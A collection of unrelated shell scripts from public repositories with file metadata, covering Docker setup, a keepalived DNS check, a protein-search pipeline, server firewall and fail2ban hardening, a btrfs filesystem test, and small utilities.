WORKSPACE_DIRECTORY=~/github/libuv-example
docker run \
--name ${name} -it \
-v ${WORKSPACE_DIRECTORY}:/opt/libuv \
libuv:1.0 bash
echo docker stop ${name} && docker rm ${name}
| true
|
09714bcbf3e07eeda9cba8cdcbee5afdc15d7ac2
|
Shell
|
xiangjunyu/xiangjunyu
|
/LVS+DNS/check_dns.sh
|
GB18030
| 794
| 3.234375
| 3
|
[] |
no_license
|
#!/bin/bash
#Creat By xiangjunyu
#version 20170621-1.0
#˷,ע1ûDNSϾֻǼudp 53˿ǷDzģҪDNSǷ
if [ $port == 53 ];then
nslookup checkdns.test.com ${rip}|grep mail.test.com
else
#ʹncTCP˿Ƿ,keepalivedѾԴTCP⣬Բ
nc -z $rip ${port}
fi
if [ $? -eq 0 ]; then
exit 0 #ֵkeepalivedֵΪ0ʱkeepalived֪˼ӦDNS IPRSб
else
exit 1 #ֵkeepalivedֵΪ1ʱkeeplived֪˼ʧܣֱӽ˵ĹDNSRSбժ֤ҵ
fi
| true
|
962ede4055716db7cd7699c6b614a73ebf216e44
|
Shell
|
proteinevolution/Toolkit
|
/tel/runscripts/hhpred.sh
|
UTF-8
| 15,814
| 3.71875
| 4
|
[
"Apache-2.0"
] |
permissive
|
SEQ_COUNT=$(egrep '^>' ../params/alignment | wc -l)
CHAR_COUNT=$(wc -m < ../params/alignment)
A3M_INPUT=$(head -1 ../params/alignment | egrep "^#A3M#" | wc -l)
DBJOINED=""
LOW_ALN_DEPTH=""
#create file in which selected dbs are written
touch ../params/dbs
if [[ ! -f "../params/alignment_two" ]] ; then
#splitting input databases into array and completing with -d
if [[ "%hhsuitedb.content" != "" ]]
then
DBS=$(echo "%hhsuitedb.content" | tr " " "\n")
DBJOINED+=`printf -- '-d %HHSUITE/%s ' ${DBS[@]}`
#write selected databses into file
printf "${DBS[@]}" >> ../params/dbs
printf "\n" >> ../params/dbs
fi
if [[ "%proteomes.content" != "" ]]
then
PROTEOMES=$(echo "%proteomes.content" | tr " " "\n")
DBJOINED+=`printf -- '-d %HHSUITE/%s ' ${PROTEOMES[@]}`
#write selected databses into file
printf "${PROTEOMES[@]}" >> ../params/dbs
fi
DBARRAY=( ${DBJOINED} )
DBCOUNT=${#DBARRAY[@]}
if [[ ${DBCOUNT} -gt "8" ]] ; then
echo "#Only 4 databases may be selected at a time!" >> ../results/process.log
false
fi
fi
if [[ ${CHAR_COUNT} -gt "10000000" ]] ; then
echo "#Input may not contain more than 10000000 characters." >> ../results/process.log
false
fi
if [[ ${A3M_INPUT} = "1" ]] ; then
sed -i '1d' ../params/alignment
reformatValidator.pl a3m fas \
$(readlink -f ../params/alignment) \
$(readlink -f ../params/alignment.tmp) \
-d 160 -uc -l 32000
if [[ ! -f ../params/alignment.tmp ]]; then
echo "#Input is not in valid A3M format." >> ../results/process.log
false
else
echo "#Query is in A3M format." >> ../results/process.log
mv ../params/alignment.tmp ../params/alignment
echo "done" >> ../results/process.log
fi
fi
if [[ ${SEQ_COUNT} = "0" ]] && [[ ${FORMAT} = "0" ]] ; then
sed 's/[^a-z^A-Z]//g' ../params/alignment > ../params/alignment1
CHAR_COUNT=$(wc -m < ../params/alignment1)
if [[ ${CHAR_COUNT} -gt "10000" ]] ; then
echo "#Single protein sequence inputs may not contain more than 10000 characters." >> ../results/process.log
false
else
sed -i "1 i\>Q_${JOBID}" ../params/alignment1
mv ../params/alignment1 ../params/alignment
fi
fi
if [[ ${FORMAT} = "1" ]] ; then
reformatValidator.pl clu fas \
$(readlink -f %alignment.path) \
$(readlink -f ../results/${JOBID}.fas) \
-d 160 -uc -l 32000 -rh 1
else
reformatValidator.pl fas fas \
$(readlink -f %alignment.path) \
$(readlink -f ../results/${JOBID}.fas) \
-d 160 -uc -l 32000 -rh 1
fi
if [[ ! -f ../results/${JOBID}.fas ]] ; then
echo "#Input is not in aligned FASTA/CLUSTAL format." >> ../results/process.log
false
fi
SEQ_COUNT=$(egrep '^>' ../results/${JOBID}.fas | wc -l)
if [[ ${SEQ_COUNT} -gt "10000" ]] ; then
echo "#Input contains more than 10000 sequences." >> ../results/process.log
false
fi
if [[ ${SEQ_COUNT} -gt "1" ]] ; then
echo "#Query is an MSA with ${SEQ_COUNT} sequences." >> ../results/process.log
else
echo "#Query is a single protein sequence." >> ../results/process.log
fi
echo "done" >> ../results/process.log
if [[ -f ../params/alignment_two ]] ; then
echo "#Pairwise comparison mode." >> ../results/process.log
echo "done" >> ../results/process.log
#remove empty lines
sed -i '/^\s*$/d' ../params/alignment_two
SEQ_COUNT2=$(egrep '^>' ../params/alignment_two | wc -l)
CHAR_COUNT2=$(wc -m < ../params/alignment_two)
FORMAT2=$(head -1 ../params/alignment_two | egrep "^CLUSTAL" | wc -l)
A3M_INPUT2=$(head -1 ../params/alignment_two | egrep "^#A3M#" | wc -l)
if [[ ${CHAR_COUNT2} -gt "10000000" ]] ; then
echo "#Template sequence/MSA may not contain more than 10000000 characters." >> ../results/process.log
false
fi
if [[ ${A3M_INPUT2} = "1" ]] ; then
sed -i '1d' ../params/alignment_two
reformatValidator.pl a3m fas \
$(readlink -f ../params/alignment_two) \
$(readlink -f ../params/alignment_two.tmp) \
-d 160 -uc -l 32000
if [[ ! -f ../params/alignment_two.tmp ]]; then
echo "#Template is not in valid A3M format." >> ../results/process.log
false
else
echo "#Template is in A3M format." >> ../results/process.log
mv ../params/alignment_two.tmp ../params/alignment_two
echo "done" >> ../results/process.log
fi
fi
if [[ ${SEQ_COUNT2} = "0" ]] && [[ ${FORMAT2} = "0" ]] ; then
sed 's/[^a-z^A-Z]//g' ../params/alignment_two > ../params/alignment2
CHAR_COUNT2=$(wc -m < ../params/alignment2)
if [[ ${CHAR_COUNT2} -gt "10000" ]] ; then
echo "#Template protein sequence contains more than 10000 characters." >> ../results/process.log
false
else
sed -i "1 i\>T_${JOBID}" ../params/alignment2
mv ../params/alignment2 ../params/alignment_two
fi
fi
if [[ ${FORMAT2} = "1" ]] ; then
reformatValidator.pl clu fas \
$(readlink -f %alignment_two.path) \
$(readlink -f ../results/${JOBID}.2.fas) \
-d 160 -uc -l 32000 -rh 1
else
#remove empty lines
sed -i '/^\s*$/d' ../params/alignment_two
reformatValidator.pl fas fas \
$(readlink -f %alignment_two.path) \
$(readlink -f ../results/${JOBID}.2.fas) \
-d 160 -uc -l 32000 -rh 1
fi
if [[ ! -f ../results/${JOBID}.2.fas ]] ; then
echo "#Template MSA is not in aligned FASTA/CLUSTAL format." >> ../results/process.log
false
fi
SEQ_COUNT2=$(egrep '^>' ../results/${JOBID}.2.fas | wc -l)
if [[ ${SEQ_COUNT2} -gt "10000" ]] ; then
echo "#Template MSA contains more than 10000 sequences." >> ../results/process.log
false
fi
if [[ ${SEQ_COUNT2} -gt "1" ]] ; then
echo "#Template is an MSA with ${SEQ_COUNT} sequences." >> ../results/process.log
else
echo "#Template is a single protein sequence." >> ../results/process.log
fi
mv ../results/${JOBID}.2.fas ../params/alignment_two
echo "done" >> ../results/process.log
fi
head -n 2 ../results/${JOBID}.fas > ../results/firstSeq0.fas
sed 's/[\.\-]//g' ../results/firstSeq0.fas > ../results/firstSeq.fas
echo "#Predicting sequence features." >> ../results/process.log
TMPRED=`tmhmm ../results/firstSeq.fas -short`
run_Coils -c -min_P 0.8 < ../results/firstSeq.fas >& ../results/firstSeq.cc
COILPRED=$(egrep ' 0 in coil' ../results/firstSeq.cc | wc -l)
# Run SignalP; since the source organism is unknown, check all four cases
${BIOPROGS}/tools/signalp/bin/signalp -org 'euk' -format 'short' -fasta ../results/firstSeq.fas -prefix "../results/${JOBID}_euk" -tmp '../results/'
${BIOPROGS}/tools/signalp/bin/signalp -org 'gram+' -format 'short' -fasta ../results/firstSeq.fas -prefix "../results/${JOBID}_gramp" -tmp '../results/'
${BIOPROGS}/tools/signalp/bin/signalp -org 'gram-' -format 'short' -fasta ../results/firstSeq.fas -prefix "../results/${JOBID}_gramn" -tmp '../results/'
${BIOPROGS}/tools/signalp/bin/signalp -org 'arch' -format 'short' -fasta ../results/firstSeq.fas -prefix "../results/${JOBID}_arch" -tmp '../results/'
rm ../results/firstSeq0.fas ../results/firstSeq.cc
echo "done" >> ../results/process.log
ITERS=%msa_gen_max_iter.content
#CHECK IF MSA generation is required or not
if [[ ${ITERS} = "0" ]] ; then
echo "#No MSA generation required for building A3M." >> ../results/process.log
reformat_hhsuite.pl fas a3m ../results/${JOBID}.fas ${JOBID}.a3m -M first
mv ${JOBID}.a3m ../results/${JOBID}.a3m
echo "done" >> ../results/process.log
else
#MSA generation required
#Check what method to use (PSI-BLAST? HHblits?)
echo "#Query MSA generation required." >> ../results/process.log
echo "done" >> ../results/process.log
#MSA generation by PSI-BLAST
if [[ "%msa_gen_method.content" = "psiblast" ]] ; then
echo "#Running ${ITERS} iteration(s) of PSI-BLAST for query MSA generation." >> ../results/process.log
#Check if input is a single sequence or an MSA
INPUT="query"
if [[ ${SEQ_COUNT} -gt 1 ]] ; then
INPUT="in_msa"
fi
psiblast -db ${STANDARD}/nr70 \
-num_iterations ${ITERS} \
-evalue %hhpred_incl_eval.content \
-inclusion_ethresh 0.001 \
-num_threads %THREADS \
-num_descriptions 20000 \
-num_alignments 20000 \
-${INPUT} ../results/${JOBID}.fas \
-out ../results/output_psiblastp.html
#keep results only of the last iteration
shorten_psiblast_output.pl ../results/output_psiblastp.html ../results/output_psiblastp.html
#extract MSA in a3m format
alignhits_html.pl ../results/output_psiblastp.html ../results/${JOBID}.a3m \
-Q ../results/${JOBID}.fas \
-e %hhpred_incl_eval.content \
-cov %min_cov.content \
-a3m \
-no_link \
-blastplus
echo "done" >> ../results/process.log
else
#MSA generation by HHblits
echo "#Running ${ITERS} iteration(s) of HHblits against %msa_gen_method.content for query MSA generation." >> ../results/process.log
reformat_hhsuite.pl fas a3m \
$(readlink -f ../results/${JOBID}.fas) \
$(readlink -f ../results/${JOBID}.in.a3m)
hhblits -cpu %THREADS \
-v 2 \
-e %hhpred_incl_eval.content \
-i ../results/${JOBID}.in.a3m \
-d %UNIREF \
-oa3m ../results/${JOBID}.a3m \
-n ${ITERS} \
-qid %min_seqid_query.content \
-cov %min_cov.content \
-mact 0.35
rm ../results/${JOBID}.in.a3m
echo "done" >> ../results/process.log
fi
fi
echo "#Generating query A3M." >> ../results/process.log
QA3M_COUNT=$(egrep '^>' ../results/${JOBID}.a3m | wc -l)
#Generate representative MSA for forwarding
hhfilter -i ../results/${JOBID}.a3m \
-o ../results/reduced.a3m \
-diff 200
sed -i "1 i\#A3M#" ../results/reduced.a3m
reformat_hhsuite.pl a3m a3m \
$(readlink -f ../results/${JOBID}.a3m) \
$(readlink -f ../results/tmp0) \
-d 160 -l 32000
head -n 400 ../results/tmp0 > ../results/tmp1
reformat_hhsuite.pl a3m fas \
$(readlink -f ../results/tmp1) \
$(readlink -f ../results/reduced.fas) \
-d 160 -l 32000 -uc
rm ../results/tmp0 ../results/tmp1
# Here assume that the query alignment exists
# prepare histograms
# Reformat query into fasta format ('full' alignment, i.e. 100 maximally diverse sequences, to limit amount of data to transfer)
mv ../results/${JOBID}.a3m ../results/full.a3m
addss.pl ../results/full.a3m
echo "done" >> ../results/process.log
# creating alignment of query and subject input
if [[ -f ../params/alignment_two ]]
then
cd ../results
if [[ ${ITERS} = "0" ]] && [[ ${SEQ_COUNT2} -gt "1" ]] ; then
echo "#No MSA generation required for building template A3M." >> ../results/process.log
reformat_hhsuite.pl fas a3m %alignment_two.path db.a3m -M first
else
echo "#Running 3 iterations of HHblits for template MSA and A3M generation." >> ../results/process.log
reformat_hhsuite.pl fas a3m \
$(readlink -f %alignment_two.path) \
$(readlink -f ../results/${JOBID}.in2.a3m)
hhblits -d %UNIREF -i ../results/${JOBID}.in2.a3m -oa3m db.a3m -n 3 -cpu %THREADS -v 2
rm ../results/${JOBID}.in2.a3m
fi
addss.pl db.a3m
ffindex_build -as db_a3m.ff{data,index} db.a3m
hhmake -i db.a3m -o db.hhm
ffindex_build -as db_hhm.ff{data,index} db.hhm
cstranslate -A ${HHLIB}/data/cs219.lib -D ${HHLIB}/data/context_data.lib -x 0.3 -c 4 -f -i db_a3m -o db_cs219 -I a3m -b
ffindex_build -as db_cs219.ff{data,index}
DBJOINED+="-d ../results/db"
cd ../0
echo "done" >> ../results/process.log
fi
if [[ -f ../params/alignment_two ]] ; then
echo "#Comparing query profile HMM with template profile HMM." >> ../results/process.log
else
echo "#Searching profile HMM database(s)." >> ../results/process.log
fi
if [[ "%alignmacmode.content" = "loc" ]] ; then
MACT="-norealign"
ALIGNMODE="-loc"
fi
if [[ "%alignmacmode.content" = "locrealign" ]] ; then
MACT_SCORE=%macthreshold.content
MACT="-realign -mact ${MACT_SCORE}"
ALIGNMODE="-loc"
fi
if [[ "%alignmacmode.content" = "glob" ]] ; then
MACT="-realign -mact 0.0"
ALIGNMODE="-glob"
fi
# Perform HHsearch #
hhsearch -cpu %THREADS \
-i ../results/full.a3m \
${DBJOINED} \
-o ../results/${JOBID}.hhr \
-oa3m ../results/${JOBID}.a3m \
-p %pmin.content \
-Z %desc.content \
${ALIGNMODE} \
-z 1 \
-b 1 \
-B %desc.content \
-ssm %ss_scoring.content \
-sc 1 \
-seq 1 \
-dbstrlen 10000 \
${MACT} \
-maxres 32000 \
-contxt ${HHLIB}/data/context_data.crf
echo "done" >> ../results/process.log
echo "#Preparing output." >> ../results/process.log
#create full alignment json; use for forwarding
fasta2json.py ../results/reduced.fas ../results/reduced.json
hhviz.pl ${JOBID} ../results/ ../results/ &> /dev/null
#Generate query template alignment
hhmakemodel.pl -i ../results/${JOBID}.hhr -fas ../results/alignment.fas -p %pmin.content
# Generate Query in JSON
fasta2json.py ../results/alignment.fas ../results/querytemplate.json
# Generate Hitlist in JSON for hhrfile
hhr2json.py "$(readlink -f ../results/${JOBID}.hhr)" > ../results/results.json
# Create a JSON with probability values of the hits
extract_from_json.py -tool hhpred ../results/results.json ../results/plot_data.json
# Generate Query in JSON
fasta2json.py ../results/firstSeq.fas ../results/query.json
# add DB to json
manipulate_json.py -k 'db' -v '%hhsuitedb.content' ../results/results.json
# add Proteomes to json
manipulate_json.py -k 'proteomes' -v '%proteomes.content' ../results/results.json
# add transmembrane prediction info to json
manipulate_json.py -k 'tmpred' -v "${TMPRED}" ../results/results.json
# add coiled coil prediction info to json
manipulate_json.py -k 'coilpred' -v "${COILPRED}" ../results/results.json
# Write results of signal peptide prediction
SIGNALP=$(grep 'SP(Sec/SPI)' ../results/*.signalp5 | wc -l)
if [[ ${SIGNALP} -gt "4" ]]; then
manipulate_json.py -k 'signal' -v "1" ../results/results.json
else
manipulate_json.py -k 'signal' -v "0" ../results/results.json
fi
rm ../results/*.signalp5
# For alerting user if too few homologs are found for building A3M
if [[ ${ITERS} = "0" ]] ; then
manipulate_json.py -k 'msa_gen' -v "custom" ../results/results.json
else
manipulate_json.py -k 'msa_gen' -v "%msa_gen_method.content" ../results/results.json
fi
# Number of sequences in the query A3M
manipulate_json.py -k 'qa3m_count' -v ${QA3M_COUNT} ../results/results.json
echo "done" >> ../results/process.log
| true
|
dc38c5aff477f71cdf7c6d41c968be5a857510ba
|
Shell
|
ASVLeipzig/cor-asv-ann-data-processing
|
/ground-truth.sh
|
UTF-8
| 328
| 2.734375
| 3
|
[] |
no_license
|
#!/bin/bash
mkdir -p ground-truth
cd ground-truth
rm -f IndexGT.html
wget http://www.ocr-d.de/sites/all/GTDaten/IndexGT.html
for file in $(grep -o '"[^"]*[.]zip"' IndexGT.html | tr -d '"')
do
test -f $file || wget http://www.ocr-d.de/sites/all/GTDaten/$file
done
test -d assets || git clone https://github.com/OCR-D/assets
| true
|
b0be56e4cf64ebc997f973674fbfb31400ce3e25
|
Shell
|
shpp-abelokon/chat
|
/mychat_v.01
|
UTF-8
| 1,754
| 3.59375
| 4
|
[] |
no_license
|
#! /bin/sh
### BEGIN INIT INFO
# Provides: skeleton
# Required-Start: $remote_fs $syslog
# Required-Stop: $remote_fs $syslog
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: Example initscript
# Description: This file should be used to construct scripts to be
# placed in /etc/init.d.
### END INIT INFO
# Author:
#
# Please remove the "Author" lines above and replace them
# with your own name if you copy and modify this script.
# Do NOT "set -e"
# PATH should only include /usr/* if it runs after the mountnfs.sh script
PATH=/sbin:/usr/sbin:/bin:/usr/bin
DESC="mychat on socket.io"
NAME=mychat
DAEMON=/usr/sbin/$NAME
DAEMON_ARGS="--options args"
PIDFILE=/var/run/$NAME.pid
SCRIPTNAME=/etc/init.d/$NAME
SOURCE_DIR=/opt/chat
COMMAND=node
SOURCE_NAME=server.js
USER=vagrant
LOG_FILE=/log/$NAME.log
forever=forever
start() {
touch $LOG_FILE
chown $USER $LOG_FILE
touch $PIDFILE
chown $USER $PIDFILE
sudo -H -u $USER $forever start --pidFile $PIDFILE -l $LOG_FILE -a --sourceDir $SOURCE_DIR -c $COMMAND $SOURCE_NAME
RETVAL=$?
}
restart() {
echo -n "Restarting $NAME node instance : "
cd $SOURCE_DIR
sudo -H -u $USER $forever restart $SOURCE_NAME
RETVAL=$?
}
status() {
echo "Status for $NAME:"
sudo -H -u $USER $forever list
RETVAL=$?
}
stop() {
echo -n "Shutting down $NAME node instance : "
cd $SOURCE_DIR
sudo -H -u $USER $forever stop $SOURCE_NAME
}
case "$1" in
start)
start
;;
stop)
stop
;;
status)
status
;;
restart)
restart
;;
*)
echo "Usage: {start|stop|status|restart}"
exit 1
;;
esac
exit $RETVAL
| true
|
e49402daa1e66bfadf5dbd5e56517565234b01c1
|
Shell
|
realtingley/legacy
|
/newSetup.sh
|
UTF-8
| 7,052
| 3.453125
| 3
|
[] |
no_license
|
#!/bin/bash
#If possible, add something in for choosing [1] Configure Basics [2] Configure Security [3] Configure VMware Tools [4] Configure All. This might require Perl.
#set -x
read -p "RUN AS SUDO This script will perform basic configuration, as well as security configuration. Please connect VMware Tools image to include in installation. THIS SCRIPT WILL REPLACE A LOT OF IMPORTANT FILES. Seriously. Run this only on new systems. Press [ENTER] to continue or ^C to exit."
#read -p "Configure this server to be on 50.247.195.80/28?" yn
#while true; do
#case $yn in
# [Yy]* )
# echo "What IP address will be assigned to this server?"
# read ADDRESS
# cat <<EOF > /etc/network/interfaces
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
#
# The loopback network interface
#auto lo
#iface lo inet loopback
#
# The primary network interface
#auto eth0
#iface eth0 inet static
#address $ADDRESS
#netmask 255.255.255.240
#gateway 50.247.195.94
#dns-nameservers 8.8.8.8 8.8.4.4
#EOF
# break;;
# [Nn]* ) break;;
# * ) echo "Please answer [y]es or [n]o." ;;
#esac
#done
# Update apt-get and upgrade any installed packages
apt-get update && apt-get -y dist-upgrade
# Install NTP, OpenSSH, Fail2Ban, PSAD
debconf-set-selections <<< "postfix postfix/main_mailer_type select No configuration"
apt-get install -y ntp openssh-server fail2ban psad
# Disable root login on SSH and decrease grace time
sed -i '/LoginGraceTime/ c\LoginGraceTime 60' /etc/ssh/sshd_config
sed -i '/PermitRootLogin/ c\PermitRootLogin no' /etc/ssh/sshd_config
sed -i '/StrictModes/ c\StrictModes yes' /etc/ssh/sshd_config
service ssh restart
# Disable IPv6
cat <<END >> /etc/sysctl.conf
net.ipv6.conf.all.disable_ipv6 = 1
net.ipv6.conf.default.disable_ipv6 = 1
net.ipv6.conf.lo.disable_ipv6 = 1
END
# Log martians, deny ICMP routing
sed -i '/net.ipv4.conf.all.log_martians/ c\net.ipv4.conf.all.log_martians = 1' /etc/sysctl.conf
sed -i '/net.ipv4.conf.all.accept_source_route/ c\net.ipv4.conf.all.accept_source_route = 0' /etc/sysctl.conf
sed -i '/net.ipv4.conf.all.send_redirects/ c\net.ipv4.conf.all.send_redirects = 0' /etc/sysctl.conf
sed -i '/net.ipv4.conf.all.accept_redirects/ c\net.ipv4.conf.all.accept_redirects = 0' /etc/sysctl.conf
# Configure the firewall
iptables -F
iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j ACCEPT
#iptables -A INPUT -p tcp --dport 8080 -j ACCEPT
iptables -I INPUT 1 -i lo -j ACCEPT
iptables -P INPUT DROP
iptables -A INPUT -j LOG
iptables -A FORWARD -j LOG
echo iptables-persistent iptables-persistent/autosave_v4 boolean true | debconf-set-selections
echo iptables-persistent iptables-persistent/autosave_v6 boolean true | debconf-set-selections
apt-get install -y iptables-persistent
# Fail2Ban Configuration
cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local
sed -i '21s/.*/ignoreip = 127.0.0.1\/8 192.168.0.0\/16 50.247.195.80\/28/' /etc/fail2ban/jail.local
sed -i '22s/600/1800/' /etc/fail2ban/jail.local
sed -i '23s/.*/maxretry = 5/' /etc/fail2ban/jail.local
sed -i '24s/.*/findtime = 1200/' /etc/fail2ban/jail.local
sed -i '99s/6/5/' /etc/fail2ban/jail.local
cat <<FIN >> /etc/fail2ban/jail.local
[ssh-repeater]
enabled = true
port = ssh
filter = sshd
action = iptables-repeater[name=ssh]
sendmail-whois[name=SSH-repeater, dest=root, sender=root]
logpath = /var/log/auth.log
maxretry = 25
findtime = 31536000
bantime = 31536000
# This section is needed if wp-fail2ban is installed as a plugin on Wordpress
#[wordpress-auth-repeater]
#enabled = true
#port = http,https
#filter = wordpress
#action = iptables-repeater[name=wordpress]
# sendmail-whois[name=wordpress-repeater, dest=root, sender=root]
#logpath = /var/log/auth.log
#maxretry = 35
#findtime = 31536000
#bantime = 31536000
FIN
touch /etc/fail2ban/action.d/iptables-repeater.conf
cat <<"endOFfile" > /etc/fail2ban/action.d/iptables-repeater.conf
# Fail2ban configuration file
#
# Author: Phil Hagen <phil@identityvector.com>
#
[Definition]
# Option: actionstart
# Notes.: command executed once at the start of Fail2Ban.
# Values: CMD
#
actionstart = iptables -N fail2ban-REPEAT-<name>
iptables -A fail2ban-REPEAT-<name> -j RETURN
iptables -I INPUT -j fail2ban-REPEAT-<name>
# set up from the static file
cat /etc/fail2ban/ip.blocklist.<name> |grep -v ^\s*#|awk '{print $1}' | while read IP; do iptables -I fail2ban-REPEAT-<name> 1 -s $IP -j DROP; done
# Option: actionstop
# Notes.: command executed once at the end of Fail2Ban
# Values: CMD
#
actionstop = iptables -D INPUT -j fail2ban-REPEAT-<name>
iptables -F fail2ban-REPEAT-<name>
iptables -X fail2ban-REPEAT-<name>
# Option: actioncheck
# Notes.: command executed once before each actionban command
# Values: CMD
#
actioncheck = iptables -n -L INPUT | grep -q fail2ban-REPEAT-<name>
# Option: actionban
# Notes.: command executed when banning an IP. Take care that the
# command is executed with Fail2Ban user rights.
# Tags: <ip> IP address
# <failures> number of failures
# <time> unix timestamp of the ban time
# Values: CMD
#
actionban = iptables -I fail2ban-REPEAT-<name> 1 -s <ip> -j DROP
# also put into the static file to re-populate after a restart
! grep -Fq <ip> /etc/fail2ban/ip.blocklist.<name> && echo "<ip> # fail2ban/$( date '+%%Y-%%m-%%d %%T' ): auto-add for repeat offender" >> /etc/fail2ban/ip.blocklist.<name>
# Option: actionunban
# Notes.: command executed when unbanning an IP. Take care that the
# command is executed with Fail2Ban user rights.
# Tags: <ip> IP address
# <failures> number of failures
# <time> unix timestamp of the ban time
# Values: CMD
#
actionunban = /bin/true
[Init]
# Defaut name of the chain
#
name = REPEAT
endOFfile
service fail2ban restart
# PSAD Configuration
cp /etc/psad/psad.conf /etc/psad/psad.conf.orig
sed -i "s/_CHANGEME_;/${HOSTNAME};/" /etc/psad/psad.conf
sed -i 's/HOME_NET any;/HOME_NET 50.247.195.80\/28;/' /etc/psad/psad.conf
sed -i 's/var\/log\/messages/var\/log\/syslog/' /etc/psad/psad.conf
sed -i '/ENABLE_AUTO_IDS N;/ c\ENABLE_AUTO_IDS Y;' /etc/psad/psad.conf
sed -i '/AUTO_IDS_DANGER_LEVEL/ c\AUTO_IDS_DANGER_LEVEL 4;' /etc/psad/psad.conf
echo '127.0.0.0/8 0;' >> /etc/psad/auto_dl
echo '50.247.195.80/28 0;' >> /etc/psad/auto_dl
psad --sig-update
service psad restart
# Add psad sig-update to weekly root crontab
crontab -l > /tmp/mycron
echo '00 06 * * 1 psad --sig-update' >> /tmp/mycron
crontab /tmp/mycron
rm /tmp/mycron
# VMware Tools install
mkdir /mnt/cdrom
mount /dev/cdrom /mnt/cdrom
VMWT=$(ls /mnt/cdrom/VMwareTools*)
tar xzvf "$VMWT" -C /tmp/
/tmp/vmware-tools-distrib/vmware-install.pl -d
# Reminder to install VMware Tools
echo "Remember to install VMware Tools if you didn't!"
exit 0
| true
|
351fd65bdd0c566dd6fe6240a9deb709fb5ba665
|
Shell
|
kdave/xfstests
|
/tests/btrfs/216
|
UTF-8
| 1,182
| 3.046875
| 3
|
[] |
no_license
|
#! /bin/bash
# SPDX-License-Identifier: GPL-2.0
# Copyright (c) 2020 Oracle. All Rights Reserved.
#
# FS QA Test 216
#
# Test if the show_devname() returns sprout device instead of seed device.
#
# Fixed in kernel patch:
# btrfs: btrfs_show_devname don't traverse into the seed fsid
. ./common/preamble
_begin_fstest auto quick seed
# Import common functions.
. ./common/filter
# real QA test starts here
_supported_fs btrfs
_require_scratch_dev_pool 2
_scratch_dev_pool_get 2
seed=$(echo $SCRATCH_DEV_POOL | $AWK_PROG '{print $1}')
sprout=$(echo $SCRATCH_DEV_POOL | $AWK_PROG '{print $2}')
_mkfs_dev $seed
$BTRFS_TUNE_PROG -S 1 $seed
_mount $seed $SCRATCH_MNT >> $seqres.full 2>&1
cat /proc/self/mounts | grep $seed >> $seqres.full
$BTRFS_UTIL_PROG device add -f $sprout $SCRATCH_MNT >> $seqres.full
cat /proc/self/mounts | grep $sprout >> $seqres.full
# check if the show_devname() returns the sprout device instead of seed device.
dev=$(grep $SCRATCH_MNT /proc/self/mounts | $AWK_PROG '{print $1}')
if [ "$sprout" != "$dev" ]; then
echo "Unexpected device: $dev, expected $sprout"
fi
echo "Silence is golden"
_scratch_dev_pool_put
# success, all done
status=0
exit
| true
|
0f98a1d7cf64bbd05751dc256053aad554a376d2
|
Shell
|
Zlatov/lab
|
/bash/sql_to_file/select_result_to_text.sh
|
UTF-8
| 916
| 3.296875
| 3
|
[] |
no_license
|
#!/bin/bash
# Если есть локальный конфиг - подключаем, установим пароль для mysql
if [ -f ./config.sh ]
then
. "./config.sh"
export MYSQL_PWD="$DBPASS"
else
echo 'Локальный конфиг не найден'
exit 1
fi
if [ ! -f ./1.sql ]
then
echo Файл 1.sql не найден
else
if [ -f ./2.html ]
then
> 2.html
fi
mysql --host=$DBHOST --port=3306 --user="$DBUSER" --database="$DBNAME" -s < "./1.sql" > '1.html'
fi
if [ ! -f ./2.sql ]
then
echo Файл 2.sql не найден
else
if [ -f ./2.html ]
then
> 2.html
fi
mysql --host=$DBHOST --port=3306 --user="$DBUSER" --database="$DBNAME" -s < "./2.sql" | while read post_id ex; do
echo "id: $post_id"
echo "<a href=\"https://sign-forum.ru/viewtopic.php?p=$post_id#p$post_id\">$post_id</a>" >> '2.html'
done
fi
| true
|
f748589935ee6251f592c1897d3ac6818271eb25
|
Shell
|
aastaneh/loghist
|
/loghist
|
UTF-8
| 1,678
| 3.96875
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
#
# Name: loghist
#
# Purpose: a cli histogram generator for real-time log changes
#
# Author: Amin Astaneh (amin@aminastaneh.net)
#
# License Information
#
# Copyright (C) 2012
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# BEGIN FUNCTIONS
function tohist() {
# Prepend the histogram with the current time and total measured for timeframe
TIME=`date "+%Y/%m/%d %H:%m:%S"`
echo -en "$TIME | $1 \t"
# Take the total matches and print a bar equal in size
# There is currently no means to scale to terminal window
for i in `seq 1 $1`; do echo -n "="; done; echo
}
# END FUNCTIONS
FILE=$1
DURATION=$2
EXPRESSION=$3
if [ "$#" -ne "3" ]; then
echo "Usage: $0 file seconds expression"
echo " file: logfile to generate histogram from"
echo " seconds: number of seconds between samples"
echo " expression: uses grep"
exit 1
fi
while true; do
tohist $(
# Clever hack - tails a file for a specified time, in seconds
(tail -n0 -f $FILE & P=$! ; sleep $DURATION; kill -9 $P) |
grep "$EXPRESSION" | wc -l
);
done
| true
|
e37953fe11cc541005eee7efeec5dd5a67f32324
|
Shell
|
yozot/utils
|
/xtermtitle
|
UTF-8
| 451
| 3.609375
| 4
|
[] |
no_license
|
#!/bin/sh
## $Id: xtermtitle,v 1.1 2002/12/05 17:04:16 yozo Exp $
## xtermtitle: set xterm icon and window title string using escape string.
## see ${X11}/xc/doc/specs/xterm/ctlseqs.ms
## -- yozo. Thu Sep 2 17:32:49 JST 1999
PATH=/usr/bin
## printf is built-in function of csh.
if [ $# -eq 1 ]; then
string=$1
printf "\033]0;${string}\007"
exit 0
else
printf "$0: set xterm icon and window title string.\n"
printf "usage: $0 string\n"
fi
| true
|
4de2cc28a81fe20b99e33b369affa33e74d8a23f
|
Shell
|
igorecarrasco/covidbot
|
/bin/deploy.sh
|
UTF-8
| 653
| 2.59375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
##################################################
##################################################
# Deployment for cloud function - Covid19Bot #
##################################################
##################################################
PROJECT=impostobot
pipenv lock -r > ./covidbot/requirements.txt
